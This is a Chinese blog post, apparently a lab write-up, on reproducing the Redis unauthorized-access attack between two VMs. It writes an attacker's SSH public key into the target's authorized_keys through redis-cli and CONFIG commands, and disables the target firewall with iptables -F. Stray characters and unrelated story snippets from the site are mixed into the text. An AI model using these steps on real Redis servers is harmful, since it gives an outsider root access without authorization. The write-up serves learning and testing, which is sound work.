Redis未授權(quán)訪問

redis未授權(quán)訪問詳解
redis 未授權(quán)訪問利用
redis 未授權(quán)
redis 未授權(quán)2
centos安裝redis

連網(wǎng)方式設(shè)為橋接模式 使兩臺虛擬機之間可以互相通信

攻擊端 A


image.png

靶機 B


image.png

安裝redis

image.png

2


image.png

make結(jié)束后檬嘀,進入src目錄:cd src薄坏,將redis-server和redis-cli拷貝到/usr/bin目錄下(這樣啟動redis-server和redis-cli就不用每次都進入安裝目錄了):


image.png

返回目錄redis-3.2.11忆蚀,將redis.conf拷貝到/etc/目錄下
image.png

修改redis.conf 配置文件


image.png

使用redis.conf 配置文件啟動redis


image.png
image.png

查看一下靶機B 開放的端口 可以看到有6379

image.png

靶機B創(chuàng)建.ssh文件夾

mkdir /root/.ssh

攻擊機A

生成秘鑰 密碼設(shè)置為空


image.png

進入.ssh目錄:cd .ssh/,將生成的公鑰保存到key.txt:

(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n")>key.txt

image.png

ping 一下目標主機B的 ip

image.png

將key.txt寫入redis(使用redis-cli -h ip命令連接主機A,將文件寫入)

image.png

遠程登錄主機A的redis服務(wù):redis-cli -h 192.168.0.146 并使用CONFIG GET dir命令得到redis備份的路徑:

image.png

更改redis備份路徑為ssh公鑰存放目錄(一般默認為/root/.ssh)

image.png

設(shè)置上傳公鑰的備份文件名字為authorized_keys

image.png

檢查是否更改成功(查看有沒有authorized_keys文件)陪捷,沒有問題就保存然后退出缩滨,至此成功寫入ssh公鑰到靶機

image.png

可以在 靶機B /root/.ssh 目錄下查看 authorized_keys


image.png

開啟 ssh 服務(wù)

service ssh start

ssh 未授權(quán)登錄成功

image.png

centos 6.5作為靶機 (最后ssh無密碼登錄失敗)

cat key.txt | redis-cli -h 10.22.9.133

先前centos作為靶機B 時 會 發(fā)現(xiàn)無法連接杀饵。。谬擦。切距。。
解決辦法
把目標主機B 的防火墻關(guān)一下
iptables -F #刪除過濾規(guī)則惨远,不建議

image.png

果然是防火墻的問題谜悟。。北秽。葡幸。。贺氓。
可是真正的攻擊 對方肯定不會關(guān)防火墻的蔚叨。。掠归。缅叠。
這里只是對 redis 未授權(quán)進行復(fù)現(xiàn)所以不考慮那么多
再執(zhí)行一下

 cat 1.txt | redis-cli -h 10.22.9.133 -x set crack
image.png

but

image.png

開啟攻擊端主機A和靶機B的ssh服務(wù)

靶機B為centos6.5
輸入命令:service sshd restart 重啟SSH服務(wù)。
  命令:service sshd start 啟動服務(wù) | 命令:service sshd stop 停止服務(wù)
供給端A為kail
service ssh start

但是 還要密碼

image.png

嘗試了另一種方法還是不行


image.png
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末虏冻,一起剝皮案震驚了整個濱河市肤粱,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌厨相,老刑警劉巖领曼,帶你破解...
    沈念sama閱讀 216,324評論 6 498
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現(xiàn)場離奇詭異蛮穿,居然都是意外死亡庶骄,警方通過查閱死者的電腦和手機,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 92,356評論 3 392
  • 文/潘曉璐 我一進店門践磅,熙熙樓的掌柜王于貴愁眉苦臉地迎上來单刁,“玉大人,你說我怎么就攤上這事府适「岱桑” “怎么了肺樟?”我有些...
    開封第一講書人閱讀 162,328評論 0 353
  • 文/不壞的土叔 我叫張陵,是天一觀的道長逻淌。 經(jīng)常有香客問我么伯,道長,這世上最難降的妖魔是什么卡儒? 我笑而不...
    開封第一講書人閱讀 58,147評論 1 292
  • 正文 為了忘掉前任田柔,我火速辦了婚禮,結(jié)果婚禮上骨望,老公的妹妹穿的比我還像新娘硬爆。我一直安慰自己,他們只是感情好锦募,可當我...
    茶點故事閱讀 67,160評論 6 388
  • 文/花漫 我一把揭開白布摆屯。 她就那樣靜靜地躺著,像睡著了一般糠亩。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上准验,一...
    開封第一講書人閱讀 51,115評論 1 296
  • 那天赎线,我揣著相機與錄音,去河邊找鬼糊饱。 笑死垂寥,一個胖子當著我的面吹牛,可吹牛的內(nèi)容都是我干的另锋。 我是一名探鬼主播滞项,決...
    沈念sama閱讀 40,025評論 3 417
  • 文/蒼蘭香墨 我猛地睜開眼,長吁一口氣:“原來是場噩夢啊……” “哼夭坪!你這毒婦竟也來了文判?” 一聲冷哼從身側(cè)響起,我...
    開封第一講書人閱讀 38,867評論 0 274
  • 序言:老撾萬榮一對情侶失蹤室梅,失蹤者是張志新(化名)和其女友劉穎戏仓,沒想到半個月后,有當?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體亡鼠,經(jīng)...
    沈念sama閱讀 45,307評論 1 310
  • 正文 獨居荒郊野嶺守林人離奇死亡赏殃,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 37,528評論 2 332
  • 正文 我和宋清朗相戀三年,在試婚紗的時候發(fā)現(xiàn)自己被綠了间涵。 大學(xué)時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片仁热。...
    茶點故事閱讀 39,688評論 1 348
  • 序言:一個原本活蹦亂跳的男人離奇死亡,死狀恐怖勾哩,靈堂內(nèi)的尸體忽然破棺而出抗蠢,到底是詐尸還是另有隱情根盒,我是刑警寧澤,帶...
    沈念sama閱讀 35,409評論 5 343
  • 正文 年R本政府宣布物蝙,位于F島的核電站炎滞,受9級特大地震影響,放射性物質(zhì)發(fā)生泄漏诬乞。R本人自食惡果不足惜册赛,卻給世界環(huán)境...
    茶點故事閱讀 41,001評論 3 325
  • 文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望震嫉。 院中可真熱鬧森瘪,春花似錦、人聲如沸票堵。這莊子的主人今日做“春日...
    開封第一講書人閱讀 31,657評論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽悴势。三九已至窗宇,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間特纤,已是汗流浹背军俊。 一陣腳步聲響...
    開封第一講書人閱讀 32,811評論 1 268
  • 我被黑心中介騙來泰國打工, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留捧存,地道東北人粪躬。 一個月前我還...
    沈念sama閱讀 47,685評論 2 368
  • 正文 我出身青樓,卻偏偏與公主長得像昔穴,于是被迫代替她去往敵國和親镰官。 傳聞我的和親對象是個殘疾皇子,可洞房花燭夜當晚...
    茶點故事閱讀 44,573評論 2 353

推薦閱讀更多精彩內(nèi)容